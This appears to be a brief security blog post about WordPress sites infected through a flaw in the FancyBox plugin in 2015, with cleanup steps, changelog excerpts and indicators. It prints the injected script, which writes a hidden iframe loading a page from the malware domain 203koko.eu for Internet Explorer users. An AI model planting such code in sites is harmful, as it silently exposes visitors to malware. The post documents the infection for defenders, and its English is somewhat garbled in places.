[Malware iframe 203koko] Malware Infected WordPress Websites

Earlier this week a number of websites and blogs WordPress, received warnings from malware infection via Google Webmasters.

The problem to which Google Webmasters referred to is the presence of a code / script iframe malware the source websites.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

It seems that it is a vulnerability a Pluginacquis FancyBox for WordPress which until yesterday (05.02.2015) had not been updated for a long time.
Solving this problem and disinfecting viruses sites with this malware, is relatively simple.
1. Disable the FancyBox plugin.
2. Delete all FancyBox plugin files from the server (via FTP)
3. Install the new version of the plugin (Fancybox 3.0.4)

Fancybox for WordPress 3.0.4

- Renamed the setting affected by the security issue mentioned in 3.0.3. This should stop the malicious code from appearing on sites where the plugin is updated without removing the malicious code.

Fancybox for WordPress 3.0.3

Fixed a security issue.

Malware Info: 

TYPE: Iframe redirection
TARGET: WordPress Fancybox
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE WRITTEN: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Remove malware from your WordPress website.

Founder and editor Stealth Settings, from 2006 to the present. Experience on Linux operating systems (especially CentOS), Mac OS X, Windows XP> Windows 10 and WordPress (CMS).

Leave a Comment